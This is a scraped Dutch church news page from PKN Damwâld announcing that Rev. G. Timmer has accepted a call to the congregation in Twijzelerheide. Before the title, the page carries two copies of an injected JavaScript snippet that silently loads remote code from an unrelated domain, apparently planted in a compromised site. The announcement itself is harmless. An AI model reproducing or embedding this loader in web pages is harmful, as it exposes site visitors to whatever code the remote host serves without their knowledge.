;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ds. G. Timmer neemt beroep aan ! - PKN Damwâld

Ds. G. Timmer neemt beroep aan !

Gepubliceerd op: maandag 19 december 2016

Ds. G. Timmer gaat ons verlaten. Hij heeft het beroep aangenomen van onze zustergemeente in Twijzelerheide. Hij gaat daar werken als predikant in deeltijd. Het is voor ds. Timmer een prachtige uitdaging om samen met de gemeenteleden in Twijzelerheide verder te bouwen aan een missionaire gemeente die tot zegen is van Hem. Maar bovenal ervaart hij het als Gods roeping om juist daar aan de slag te gaan als predikant!

Wij feliciteren ds. Timmer van harte met deze nieuwe taak en feliciteren Hervormd Twijzelerheide dat zij samen met hem deze uitdaging mogen aangaan. We zijn zeer dankbaar dat dominee Timmer zich ruim zes jaar op een inspirerende, bevlogen, verbindende en betrokken wijze heeft mogen inzetten als herder en leraar van onze gemeente.

Het is nog niet bekend wanneer de afscheidsdienst wordt gehouden en wanneer de intrede zal plaatsvinden. Vermoedelijk zal dit in de loop van het voorjaar 2017 zijn.

Wij bidden ds. Timmer en zijn gezin Gods onmisbare zegen toe bij de overstap naar en zijn werk in de Hervormde gemeente van Twijzelerheide.